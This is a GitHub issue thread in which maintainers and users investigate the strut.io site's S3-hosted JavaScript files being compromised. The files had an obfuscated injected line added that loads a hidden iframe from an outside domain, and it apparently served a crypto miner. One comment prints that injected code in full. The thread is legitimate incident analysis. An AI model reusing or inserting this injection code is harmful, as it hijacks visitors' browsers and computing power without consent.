cjmielke closed this issue 5 years ago
It's actually one line injected into what appears to be each JS file: require.js, loadPresentation.js, swfobject.js, etc.
This is the content of the injected line:
var _0x75b214=["iframe","setAttribute","https://www.jqwww.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x75b214,367);var _0x48ae8e=function(t,x){var a=_0x75b214[t-=0];return a};a=document[_0x48ae8e("0x0")](_0x48ae8e("0x1")),a[_0x48ae8e("0x2")]("src",_0x48ae8e("0x3")),a.style.width="0px",a.style.height="1px",document[_0x48ae8e("0x4")][_0x48ae8e("0x5")](a);
I think we should email @tantaman about this. Since it's kinda urgent..
o_O
Any idea how that could have happened?
Someone has injected a script onto the *.vendor.js file of your strut.io website. Either someone hacked the file directly or has infected a CDN where you're pulling files from. The script injects an
My assumptions have been that the scripts were modified server-side, but I like the alternate theory of a CDN being compromised. Whatever it is, I imagine it's a propagating mechanism that is broadly targeted, and not specific to strut.io.
@tantaman the first step is to see if those files are modified on the server. Let us know.
Completely unrelated to this repo, but figured I'd drop a note as I found this issue via a search for jqwww.download.
I just helped another open source project with almost exactly the same issue. Their JS files hosted on an AWS S3 bucket were all compromised to include the iframe injection line for jqwww.download as you show above (each page on their site had the iframe injected 6 times!).
Just leaving a note that I too think it is broadly targeted. If you have S3 somehow involved in the setup of the site where these files were, even more interesting.
Yep, the whole site is hosted on S3. Was the solution for the other project to redeploy, or did they literally have credentials to the bucket? On Thu, Apr 5, 2018 at 1:04 PM Anthony Bouvier notifications@github.com wrote:
They're in the midst of investigating now actually. I just told him I found it about 2 hours ago. I just happened to be surfing their website when the fan on my MacBook went nuts so I tracked it down to his site (open in a tab) and then started picking his files apart.
Only his JS files and some images are in the S3 bucket, rest of his site isn't (as far as I know, but I'll double check with him).
So what he's done for now is just kill those js files entirely -- they were only for fontawesome stuff. So he's using the fontawesome CDN now.
But he looked at other JS files he had in same bucket and they too were compromised. I told him to check logs, look for suspicious logins, check read/write permissions on the files/bucket, etc.
While this is up for discussion, as a random thought: couldn't Strut technically be hosted on GitHub pages, since it's entirely client-side?
I've notified my contacts at Amazon. Wonder if they could grep the whole system ;)
Another repo potentially related as it mentions AWS as well. Last comment says something about their CDN permissions being set public -- not sure if that has anything to do with it, I'm not a big AWS user.
https://github.com/uBlockOrigin/uAssets/issues/1698
But figured I'd share if it helps your investigation.
I've personally never used S3 before, so this exercise has been rather educational ...
I'm really shocked that this is a problem, and that it hasn't been used for things far more nefarious!
Still compromised... :fire:
This has been resolved as of today.
Hi there. The problem isn't resolved yet.
Exporting presentations results in an archive containing several injected iframes, along with a script "ricewithchicken.js"
Eats all CPU, and is a known crypto miner